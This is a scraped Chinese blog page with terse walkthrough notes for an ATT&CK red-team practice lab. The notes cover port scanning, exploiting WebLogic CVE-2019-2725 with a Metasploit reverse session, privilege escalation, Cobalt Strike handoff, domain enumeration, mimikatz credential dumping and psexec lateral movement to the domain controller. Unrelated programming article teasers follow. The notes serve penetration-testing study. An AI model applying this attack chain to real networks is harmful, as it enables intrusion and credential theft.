ATKCK红队评估实战靶场(二)-简记

news/2024/11/28 5:37:31/

001# 信息收集

nmap -sS -v 192.168.0.80  //端口探测

open :

80、135、139、445、1433、3389、7001、49152、49153、49154

445  -》smb ms17_010

139-》samba->爆破/未授权访问/远程命令执行

1433-》mssql-》爆破/注入/SA弱口令

7001-》weblogic-》反序列化漏洞

--------

002 ##发现

weblogicScan

python WeblogicScan.py 192.168.0.80 7001

-》SSRF CVE-2019-2725 CVE-2019-2729

-》 http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp

-》search-》post-》burpsuite-》operator

---------

msf-》search CVE-2019-2725->

set rhosts 192.168.0.80

set lhost 192.168.0.129

set target 1

run

->meterpreter>ipconfig

#提权

getuid

getsystem

## 内网渗透

CS->msf

CS:listener->beacon http->8888

msf:>background

use exp/win/local/payload_inject

set payload win/meterpreter/reverse_http

set DisablePayloadHandler true

set lport 8888

set session 2

run

----提权

host->执行->提权

# 信息收集

shell ipconfig /all

》10.0.0.1/24 192.168.0.0 域控ip:10.10.10.10

》delay.com

shell net user /domain

shell net group "domain admins" /domain # 查看域管理员用户

shell net group "domain contrallers" /domain #域控

shell net group "domain computers" /domain #查看狱中其他主机

shell ping PC$

shell ping DC$

shell arp -a

-》de1ay.com

-》DC.de1ay.com

portscan 10.0.0.0/24 1-1024,3389,5000-6000, arp,1024

-》445

psexec 横向移动

10.0.0.80

host-》执行-》Run mimikatz-》listener beacon SMB

10.0.0.10

host->jump->psexec64

username

password

domain

SMB

sessions

->success online!!

对其他机器横向

---


http://www.ppmy.cn/news/487378.html

相关文章

AI热门垂直领域大模型盘点(附论文)

上回分享了一些通用大模型的使用感受,今天咱们就来聊聊垂直领域大模型,照旧附上论文资料,同学们自取哈! 其实照目前的趋势来看,垂直领域大模型的未来发展是要比通用大模型好的,一是通用大模型有GPT4这座难…

Pandas数据清洗常用函数

构造一个数据集,便于演示这些函数。 import pandas as pd df {姓名: [漩涡鸣人, 宇智波佐助, 旗木卡卡西, 春野樱, 宇智波鼬],性别: [男, 男, men, women, 男],身份证: [463895200003128433, 429475199912122345, 420934199110102311, 431085200005230122, 420953…

Python数据挖掘入门与实践-第9章-古腾堡计划网站书籍资料下载

由于python版本以及网站更新等原因,导致了书上的代码没有用了。因此自己试着修改了代码。 下面就来讲讲修改中遇到的主要问题 问题:网站URL变更 # 书上的代码 url_base "http://www.gutenberg.myebook.bg/"fixes[1044] url_base "1…

js基础5 事件的传播/拖拽/键盘事件/div移动

事件的传播 事件的传播关于事件的传播网景公司和微软公司有不同的理解微软公司认为事件应该是由内向外传播,也就是当事件触发时,应该先触发当前元素上的事件,然后再向当前元素的祖先元素上传播,也就说事件应该在冒泡阶段执行。网…

locust学习教程(3)- 编写locust脚本

前言 一句话总结:并发的用户执行了第一类测试任务、第二类测试任务,设置所有类的测试前置、测试后置,设置每一类测试任务的测试前置,测试后置。 1、概念 1.1、一个完整的脚本示例 from locust import task, HttpUser, constant…

el-tree的使用,懒加载数据

前段时间碰到项目需要使用el-tree&#xff0c;由于未接触过还是花费了一段时间&#xff0c;特此记录一下。 需求 要初始化树形数据&#xff0c;点击展开时请求后端数据返回&#xff0c;组装成新树再渲染展示。 来吧展示 <el-form-item label"实体类型" prop&quo…

后端一次返回过多数据,前端应该如何优化处理?

我们可以采用延迟加载的策略&#xff0c;根据用户的滚动位置动态渲染数据。 创建一个server.js const http require(http) const port 8000;let list [] let num 0// create 100,000 records for (let i 0; i < 100_000; i) {numlist.push({src: https://miro.medium.…

CentOS7中使用nfs共享资源

nfs服务器&#xff1a;192.168.186.10 nfs客户端&#xff1a;192.168.186.71&#xff0c;192.168.186.74&#xff0c;192.168.186.89&#xff0c;192.168.186.92 需求&#xff1a;客户端这四台获取服务端的/home/wwwweb/ea目录 1&#xff1a;nfs客户端和服务端都要先启动rpcb…